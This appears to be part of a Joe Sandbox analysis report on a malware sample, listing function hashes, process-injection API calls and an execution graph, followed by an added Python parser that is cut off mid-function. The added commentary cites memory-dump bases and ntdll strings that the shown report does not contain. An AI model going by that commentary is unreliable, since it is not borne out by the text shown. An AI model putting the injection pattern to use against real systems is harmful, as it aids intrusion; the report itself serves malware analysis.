                                                              • Instruction Fuzzy Hash: 032138B1D003098FDB10DFAAC485BAEBBF4EF48314F54C42AD519A7240CB78A945CFA4
                                                              APIs
                                                              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0736DF70
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379812199.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7360000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: 93ec5ad22425596354dd0ce9ff02dc5f349b3b95c72db2147cd1886520ac4045
                                                              • Instruction ID: 649d18b061a6d0bd291c05f8609d8251368eed2bc992261990e8a4a05ccbd344
                                                              • Opcode Fuzzy Hash: 93ec5ad22425596354dd0ce9ff02dc5f349b3b95c72db2147cd1886520ac4045
                                                              • Instruction Fuzzy Hash: 022125B1D003499FDB10DFAAC885BEEBBF5FF48310F50842AE918A7240C7799901CBA4
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0129D897
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1368475142.0000000001290000.00000040.00000800.00020000.00000000.sdmp, Offset: 01290000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1290000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 0cbe1334b69d08a1f80650c5e470126862f02d4ad563206e333d3b81d79671e1
                                                              • Instruction ID: 86bbcf169c65c88f945805c5366b5b9bd08fe052d58ed1bd4b157280ea77b442
                                                              • Opcode Fuzzy Hash: 0cbe1334b69d08a1f80650c5e470126862f02d4ad563206e333d3b81d79671e1
                                                              • Instruction Fuzzy Hash: B021E4B5D002499FDB10CF9AD884ADEBBF4FB48310F14841AE918A7350D375A941CFA4
                                                              APIs
                                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0736D9AE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379812199.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7360000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 16534db660351c19ab3e82010a732c49ada092d9b5dfacbaaa8e64c8d3589da2
                                                              • Instruction ID: 0a8fe2583647ee481efdfe1469d55af1adc58baac4baa6f4b873ecec2a53f654
                                                              • Opcode Fuzzy Hash: 16534db660351c19ab3e82010a732c49ada092d9b5dfacbaaa8e64c8d3589da2
                                                              • Instruction Fuzzy Hash: 72116A75D003499FDB20DFAAC845BDEBBF5EB48320F108419E559A7240CB75A941CFA1
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379812199.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7360000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 0c1d2387a4a81e81e6e483bcab49b146ce14ef58d4099e529732104b75a27d27
                                                              • Instruction ID: ca3613975d4731e3bc083aaf49fba6bf102d4d5c0d40efae6194391802b75029
                                                              • Opcode Fuzzy Hash: 0c1d2387a4a81e81e6e483bcab49b146ce14ef58d4099e529732104b75a27d27
                                                              • Instruction Fuzzy Hash: 6A1158B5D003498FDB20DFAAC445BEEFBF5EB88324F24841AD519A7640CB76A941CB94
                                                              APIs
                                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0736D9AE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379812199.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7360000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: cd0733ebaa946baa984a5e311bb1945eaf975d72fbf5ebf2218ec86297167a08
                                                              • Instruction ID: 19b427f19712be6015309e0ab01b1f038c8dc042d61e7a04a11c34c5dd74650b
                                                              • Opcode Fuzzy Hash: cd0733ebaa946baa984a5e311bb1945eaf975d72fbf5ebf2218ec86297167a08
                                                              • Instruction Fuzzy Hash: E6112675D003499FDB20DFAAC845BEEBBF5EB48324F148419E919A7250CB75A940CFA4
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379812199.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7360000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 955e75b3c5f5d8cd66bdf5e14d70dc42164bd7594a3685ff044bb29f9647d0e5
                                                              • Instruction ID: d08936bd0b561b3c912fddd71f322b6c8ef782edfdc12a20bec67571e8b55322
                                                              • Opcode Fuzzy Hash: 955e75b3c5f5d8cd66bdf5e14d70dc42164bd7594a3685ff044bb29f9647d0e5
                                                              • Instruction Fuzzy Hash: 94116AB1D003498FDB20DFAAC445B9EFBF4EB88320F20841AD419A7240CB75A900CF94
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0129B17E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1368475142.0000000001290000.00000040.00000800.00020000.00000000.sdmp, Offset: 01290000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1290000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 5f815b5b68a6e4461512f3323cefd0f86e97a6e7527917f9a43bec028b80d444
                                                              • Instruction ID: c3d6638cd067631d219598045d3e6708ce7b65b63123baa6342d7b27638c8cc5
                                                              • Opcode Fuzzy Hash: 5f815b5b68a6e4461512f3323cefd0f86e97a6e7527917f9a43bec028b80d444
                                                              • Instruction Fuzzy Hash: 3211E0B5C003498FDB20DF9AD844BDEFBF4EB88724F10842AD929A7610C379A545CFA5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1367639212.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_123d000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7f58ce2826302328a9816e24bae4c0a5a27ef065e1459a91ea8204130143f637
                                                              • Instruction ID: 3cf260b186d24136836b372e2881f3546f14ac8fd14bde931d43693ff386a614
                                                              • Opcode Fuzzy Hash: 7f58ce2826302328a9816e24bae4c0a5a27ef065e1459a91ea8204130143f637
                                                              • Instruction Fuzzy Hash: 8A2106B1514208DFDB05DF94D9C4B26BB65FBC8320F60C569ED050B247C376D416CBA1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1367639212.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_123d000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7a4f60eb82734fadc8969361533eba8319149d492deb19b6d4e4eed705095b96
                                                              • Instruction ID: ce6c48592b902d0fc74d1e62adbacbee49a13c6708f83532205f3d16904c94d2
                                                              • Opcode Fuzzy Hash: 7a4f60eb82734fadc8969361533eba8319149d492deb19b6d4e4eed705095b96
                                                              • Instruction Fuzzy Hash: B92133B5624208DFDB05DF54D9C0B56BB65FBC8324F60C169EA090B246C336E856CBA2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1367813804.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_124d000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 701f06cf0b2c5fe6419c129b8d2ce1ef24500fe3b7a64dbed87e3c7ebbb2961d
                                                              • Instruction ID: da998c8c60f0b9e28b28068e6903983f600590b073d92f96ddeb809c5cb71834
                                                              • Opcode Fuzzy Hash: 701f06cf0b2c5fe6419c129b8d2ce1ef24500fe3b7a64dbed87e3c7ebbb2961d
                                                              • Instruction Fuzzy Hash: B0212571614208DFDB09DF94D9C0B15BBA1FB94324F20C66DE9094B343C376D806CA61
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1367813804.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_124d000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 88fe3ae48f9f890f2a29a50be7b61812b58eb97294f9e7eb509c34684f85b1c0
                                                              • Instruction ID: 1cc5bd585e54d48508d662d0bd418b4fdaa72527d887c1b8f9bc03f9f1f41375
                                                              • Opcode Fuzzy Hash: 88fe3ae48f9f890f2a29a50be7b61812b58eb97294f9e7eb509c34684f85b1c0
                                                              • Instruction Fuzzy Hash: 0F212275614308DFDB19DFA4D9C4B16BB61EB94314F20C5ADD90A0B386C37AD807CA62
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1367813804.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_124d000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 46882292fdca96f39763a1d124282a5d3e20c64440d19329412338e2ff845489
                                                              • Instruction ID: 45e51201d71abc6dfe3f2c46cf9d72583374e021a91aa78ab777210551bda3c3
                                                              • Opcode Fuzzy Hash: 46882292fdca96f39763a1d124282a5d3e20c64440d19329412338e2ff845489
                                                              • Instruction Fuzzy Hash: 3F219F755083849FCB07CF64D994B11BF71EB56314F28C5EAD9498F2A7C33A980ACB62
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1367639212.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_123d000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6fa0a9b6888ab601070468a7c49be392b44274aed9e91ce62da6c30ec0883e0c
                                                              • Instruction ID: 552b4aacbfd0adf570f72e7a68aab1c4f569655a5bf8936ace090f3d11119eaa
                                                              • Opcode Fuzzy Hash: 6fa0a9b6888ab601070468a7c49be392b44274aed9e91ce62da6c30ec0883e0c
                                                              • Instruction Fuzzy Hash: 4E21CDB6504244CFDB06CF54D9C4B16BF72FB84320F24C1AADD090A257C33AD42ACBA1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1367639212.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_123d000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                              • Instruction ID: c36b49ca3d861c958e2b57521a0184a94f93cfa62c51a790670fa39414818f2a
                                                              • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                              • Instruction Fuzzy Hash: B81103B6504284CFCB06CF54D5C0B56BF72FB84324F24C2A9DA490B257C33AE456CBA1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1367813804.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_124d000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                              • Instruction ID: 3e45217607b605c0c9d799d9cffc6dcda16fdaa145704006240d78129ec893a0
                                                              • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                              • Instruction Fuzzy Hash: D811BB75504284DFDB0ACF54C5C4B15BBA2FB84324F24C6ADD9494B297C33AD40ACB61
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1367639212.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_123d000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4cc19febfa4dc33bad734592ea9f2e9a2c5befd54eb9f8c1e9f4addf5f83c1f8
                                                              • Instruction ID: f778d30180a750ed233310e2df25c60da80c28980650805d29dcb6c3456a21a1
                                                              • Opcode Fuzzy Hash: 4cc19febfa4dc33bad734592ea9f2e9a2c5befd54eb9f8c1e9f4addf5f83c1f8
                                                              • Instruction Fuzzy Hash: E601F7B15143889AE7254BA5CCC5B76BFD8DFC0225F54C51AEE080E282C2789844CAB2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1367639212.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_123d000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2729b7e357ef2a21c7c5b88a58163bde276aec73437003effb4dac24910de83b
                                                              • Instruction ID: 2f7a96c1f363d0f449c14f0867dd671cae021d5e6c5e51cc15b1a2efb636ece9
                                                              • Opcode Fuzzy Hash: 2729b7e357ef2a21c7c5b88a58163bde276aec73437003effb4dac24910de83b
                                                              • Instruction Fuzzy Hash: B3F0C2710443849EE7258B19CC84B66FFD8EB80334F18C55AEE080E282C2799844CA71
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379728429.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7340000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2d9a6c448dff3687a7deb6a297b73b5d44b5085e1f5566a44f24df84be8b488a
                                                              • Instruction ID: 84e34cb3b6213208f2bca1f20f2f5219319df9bccd6feab93936faea2324f6b3
                                                              • Opcode Fuzzy Hash: 2d9a6c448dff3687a7deb6a297b73b5d44b5085e1f5566a44f24df84be8b488a
                                                              • Instruction Fuzzy Hash: BD223D71A1020ADFDF15DF64C450A9EB7F5FF85300F10869AE849AB250EB71FA85CB91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379812199.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7360000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7d25e8bb0bebd4bb5ab376b492deabe939c98c772f649d79abb1a1171cbf0e25
                                                              • Instruction ID: 6004211b93b4de03785fb5b6cd13c4ca5c5fc466ba6579bdc11da69518919159
                                                              • Opcode Fuzzy Hash: 7d25e8bb0bebd4bb5ab376b492deabe939c98c772f649d79abb1a1171cbf0e25
                                                              • Instruction Fuzzy Hash: 3DE1F7B4E102598FDB14DFA9C584AAEFBB2BF89304F24C169D418AB759D730AD41CF60
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379812199.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7360000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9836cbf69f4e695802f05b78a444c569afe92656e4b883b3a21bb07b675ec1e5
                                                              • Instruction ID: 8408fde9440cd8d97b9d3c7649d444d8b43c2536296b0fa69ce5f3bdab2d5fa9
                                                              • Opcode Fuzzy Hash: 9836cbf69f4e695802f05b78a444c569afe92656e4b883b3a21bb07b675ec1e5
                                                              • Instruction Fuzzy Hash: 35E107B4E102598FDB14DFA9C584AAEFBB2BF89304F24C169D418AB759D730AD41CF60
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379812199.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7360000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 81836f515461baa10b650789e713fd423edb8fd39098d4380d59ecd359908d12
                                                              • Instruction ID: d75d206622c9f4621fe68b6b6ffb52c602d15e9e8d2ecb84f766ed910e317671
                                                              • Opcode Fuzzy Hash: 81836f515461baa10b650789e713fd423edb8fd39098d4380d59ecd359908d12
                                                              • Instruction Fuzzy Hash: 9FE1F8B4E102598FDB14DFA9C584AAEFBB2BF89304F24C169D418AB759D730AD41CF60
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379812199.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7360000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dac67815c2b3cb03b32fd7cf7391f6d7fb6486722b558028554c865882b7bd53
                                                              • Instruction ID: ceee909ba8b4f8d9dc4936ea3bcee94a6d6b9f1206d1e358a359ce8781a9b241
                                                              • Opcode Fuzzy Hash: dac67815c2b3cb03b32fd7cf7391f6d7fb6486722b558028554c865882b7bd53
                                                              • Instruction Fuzzy Hash: 1DE127B4E102598FDB14DFA9C584AAEFBB2BF89300F24C169D418AB359D730AD41CF60
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379812199.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7360000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 076642115a632a021a770b63f6541b6ada669aa0958c4b14a38ce923af513b10
                                                              • Instruction ID: c1436a882e4f8174dc5595ba5c1d5d671232d5f0fbd9d12aa5110d240e36591b
                                                              • Opcode Fuzzy Hash: 076642115a632a021a770b63f6541b6ada669aa0958c4b14a38ce923af513b10
                                                              • Instruction Fuzzy Hash: CAE106B4E102598FDB14DFA9C584AAEFBB2BF89304F24C169D418AB759D730AD41CF60
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1368475142.0000000001290000.00000040.00000800.00020000.00000000.sdmp, Offset: 01290000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1290000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 438afd41953eb86c74681b15cd3ef70b1933cf3d9378af045b1f87e1fd998224
                                                              • Instruction ID: 41a490d9bb249d4d48a2c82dd0111551324bee341669f5d3f4f470533cbfe81e
                                                              • Opcode Fuzzy Hash: 438afd41953eb86c74681b15cd3ef70b1933cf3d9378af045b1f87e1fd998224
                                                              • Instruction Fuzzy Hash: D7A18F36E102068FCF19DFB8C9405AEBBB2FF85300B25416AE905EB255DB71E955CB40
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379812199.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7360000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: daa74a68f8c4586be42dc27906d1beed43ace0629772468b8818b4a3f03b22f1
                                                              • Instruction ID: 5d946cab09b72f24395dfb99abba653ed2f3aff4ebed6ba4c8565792715c6cc3
                                                              • Opcode Fuzzy Hash: daa74a68f8c4586be42dc27906d1beed43ace0629772468b8818b4a3f03b22f1
                                                              • Instruction Fuzzy Hash: A35139B4E102198BDB14CFA9C5409AEFBF2BF89304F24C169D418AB75AD7319941CFA1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1379812199.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7360000_n2pGr8w21V.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c53080449c6bb7b4dbef06420f5f6991de0295b5fc021a6c690d27b468c0283d
                                                              • Instruction ID: 7b73b3bd4d678cf6549f51a57f57e7febd53239d1d72744c378976a79cb7f198
                                                              • Opcode Fuzzy Hash: c53080449c6bb7b4dbef06420f5f6991de0295b5fc021a6c690d27b468c0283d
                                                              • Instruction Fuzzy Hash: C8513BB0E102298FDB15CFA9C5805AEFBB6BF89304F24C16AD418A7759D7319941CFA0

                                                              Execution Graph

                                                              Execution Coverage:1.3%
                                                              Dynamic/Decrypted Code Coverage:4.9%
                                                              Signature Coverage:4.9%
                                                              Total number of Nodes:142
                                                              Total number of Limit Nodes:9
                                                              execution_graph 90269 424e03 90270 424e1c 90269->90270 90271 424e67 90270->90271 90274 424eaa 90270->90274 90276 424eaf 90270->90276 90277 42e893 90271->90277 90275 42e893 RtlFreeHeap 90274->90275 90275->90276 90280 42cb33 90277->90280 90279 424e77 90281 42cb4d 90280->90281 90282 42cb5e RtlFreeHeap 90281->90282 90282->90279 90421 424a73 90422 424a8f 90421->90422 90423 424ab7 90422->90423 90424 424acb 90422->90424 90426 42c7c3 NtClose 90423->90426 90425 42c7c3 NtClose 90424->90425 90428 424ad4 90425->90428 90427 424ac0 90426->90427 90431 42e9b3 RtlAllocateHeap 90428->90431 90430 424adf 90431->90430 90432 42f933 90433 42f943 90432->90433 90434 42f949 90432->90434 90435 42e973 RtlAllocateHeap 90434->90435 90436 42f96f 90435->90436 90437 42bdb3 90438 42bdd0 90437->90438 90441 15d2df0 LdrInitializeThunk 90438->90441 90439 42bdf8 90441->90439 90283 41a603 90284 41a675 90283->90284 90285 41a61b 90283->90285 90285->90284 90287 41e573 90285->90287 90288 41e599 90287->90288 90292 41e696 90288->90292 90293 42fa63 90288->90293 90290 41e634 90290->90292 90299 42be03 90290->90299 90292->90284 90294 42f9d3 90293->90294 90297 42fa30 90294->90297 90303 42e973 90294->90303 90296 42fa0d 90298 42e893 RtlFreeHeap 90296->90298 90297->90290 90298->90297 90300 42be20 90299->90300 90309 15d2c0a 90300->90309 90301 42be4c 90301->90292 90306 42cae3 90303->90306 90305 42e98e 90305->90296 90307 42cb00 90306->90307 90308 42cb11 RtlAllocateHeap 90307->90308 90308->90305 90310 15d2c1f LdrInitializeThunk 90309->90310 90311 15d2c11 90309->90311 90310->90301 90311->90301 90312 413b23 90313 413b45 90312->90313 90315 42ca53 90312->90315 90316 42ca6d 90315->90316 90319 15d2c70 LdrInitializeThunk 90316->90319 90317 42ca95 90317->90313 90319->90317 90320 418ec3 90321 418ef3 90320->90321 90323 418f1f 90321->90323 90324 41b363 90321->90324 90325 41b3a7 90324->90325 90327 41b3c8 90325->90327 90328 42c7c3 90325->90328 90327->90321 90329 42c7dd 
90328->90329 90330 42c7ee NtClose 90329->90330 90330->90327 90331 414124 90332 4140a8 90331->90332 90337 417853 90332->90337 90334 4140cb 90335 4140ff PostThreadMessageW 90334->90335 90336 414110 90334->90336 90335->90336 90339 417877 90337->90339 90338 41787e 90338->90334 90339->90338 90341 41789d 90339->90341 90344 42fd13 LdrLoadDll 90339->90344 90342 4178b3 LdrLoadDll 90341->90342 90343 4178ca 90341->90343 90342->90343 90343->90334 90344->90341 90345 401886 90346 401816 90345->90346 90349 42fe03 90346->90349 90352 42e443 90349->90352 90353 42e469 90352->90353 90364 407333 90353->90364 90355 42e47f 90356 4019c4 90355->90356 90367 41b173 90355->90367 90358 42e49e 90359 42e4b3 90358->90359 90382 42cb83 90358->90382 90378 428343 90359->90378 90362 42e4cd 90363 42cb83 ExitProcess 90362->90363 90363->90356 90366 407340 90364->90366 90385 416503 90364->90385 90366->90355 90368 41b19f 90367->90368 90396 41b063 90368->90396 90371 41b1cc 90374 41b1d7 90371->90374 90375 42c7c3 NtClose 90371->90375 90372 41b1e4 90373 41b200 90372->90373 90376 42c7c3 NtClose 90372->90376 90373->90358 90374->90358 90375->90374 90377 41b1f6 90376->90377 90377->90358 90379 4283a5 90378->90379 90381 4283b2 90379->90381 90407 4186d3 90379->90407 90381->90362 90383 42cb9d 90382->90383 90384 42cbae ExitProcess 90383->90384 90384->90359 90386 41651d 90385->90386 90388 416536 90386->90388 90389 42d213 90386->90389 90388->90366 90391 42d22d 90389->90391 90390 42d25c 90390->90388 90391->90390 90392 42be03 LdrInitializeThunk 90391->90392 90393 42d2bc 90392->90393 90394 42e893 RtlFreeHeap 90393->90394 90395 42d2d5 90394->90395 90395->90388 90397 41b07d 90396->90397 90401 41b159 90396->90401 90402 42bea3 90397->90402 90400 42c7c3 NtClose 90400->90401 90401->90371 90401->90372 90403 42bebd 90402->90403 90406 15d35c0 LdrInitializeThunk 90403->90406 90404 41b14d 90404->90400 90406->90404 90408 4186fd 90407->90408 90414 418bfb 90408->90414 90415 413d03 90408->90415 90410 41882a 90411 42e893 RtlFreeHeap 
90410->90411 90410->90414 90412 418842 90411->90412 90413 42cb83 ExitProcess 90412->90413 90412->90414 90413->90414 90414->90381 90419 413d23 90415->90419 90417 413d8c 90417->90410 90418 413d82 90418->90410 90419->90417 90420 41b483 RtlFreeHeap LdrInitializeThunk 90419->90420 90420->90418 90442 418e18 90443 42c7c3 NtClose 90442->90443 90444 418e22 90443->90444 90445 15d2b60 LdrInitializeThunk
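The execution_graph text above is a flat token stream, not something a reader can follow by eye: a node is "<id> <hex address> [API names...]" and an edge is "<id>-><id>". The following Python parser is an added example written for this page (it is not part of the Joe Sandbox report or of the sample); the token grammar is inferred from the report text, the sample input is an excerpt copied verbatim from the execution_graph line (function 0x41a603 and everything it reaches), and the two dump bases are the "Memory Dump Source" offsets listed on this page, 0x400000 and 0x1560000. It answers the two questions a reverser asks of such a graph: which APIs an entry point reaches, and in which dump each reached node lives. That split matters here because the 0x1560000 region carries ntdll's own strings (minkernel\ntdll\ldrinit.c, LdrpInitializeExecutionOptions, the critical-section verifier messages), so LdrInitializeThunk nodes at 0x15d2xxx are calls from the 0x400000 code into that region, not into the payload itself.

```python
"""Parse a Joe Sandbox 'execution_graph' edge list and report, per entry point,
which APIs it reaches and in which memory dump each call site lives.

Added example, not part of the Joe Sandbox report. The token format is
inferred from the report text: a node is '<id> <hex addr> [API ...]', an edge
is '<id>-><id>'. Only execution_graph lines in this shape are handled."""
from collections import deque

# Excerpt copied from the report's execution_graph line (function 0x41a603 and
# everything it calls). The dump bases are the two "Memory Dump Source" offsets.
GRAPH_EXCERPT = (
    "execution_graph 90283 41a603 90284 41a675 90283->90284 90285 41a61b "
    "90283->90285 90285->90284 90287 41e573 90285->90287 90288 41e599 "
    "90287->90288 90292 41e696 90288->90292 90293 42fa63 90288->90293 "
    "90290 41e634 90290->90292 90299 42be03 90290->90299 90292->90284 "
    "90294 42f9d3 90293->90294 90297 42fa30 90294->90297 90303 42e973 "
    "90294->90303 90296 42fa0d 90298 42e893 RtlFreeHeap 90296->90298 "
    "90297->90290 90298->90297 90300 42be20 90299->90300 90309 15d2c0a "
    "90300->90309 90301 42be4c 90301->90292 90306 42cae3 90303->90306 "
    "90305 42e98e 90305->90296 90307 42cb00 90306->90307 90308 42cb11 "
    "RtlAllocateHeap 90307->90308 90308->90305 90310 15d2c1f "
    "LdrInitializeThunk 90309->90310 90311 15d2c11 90309->90311 "
    "90310->90301 90311->90301"
)
DUMP_BASES = (0x400000, 0x1560000)


def parse_execution_graph(text):
    """Return ({node_id: (addr, [apis])}, [(src, dst)]) from the flat token list.

    Disambiguation relies on position, not on the character set: a node id is
    always followed by its address, so a purely decimal token such as 414124 is
    an address when it sits in address position and an id otherwise."""
    tokens = text.split()
    if tokens and tokens[0] == "execution_graph":
        tokens = tokens[1:]
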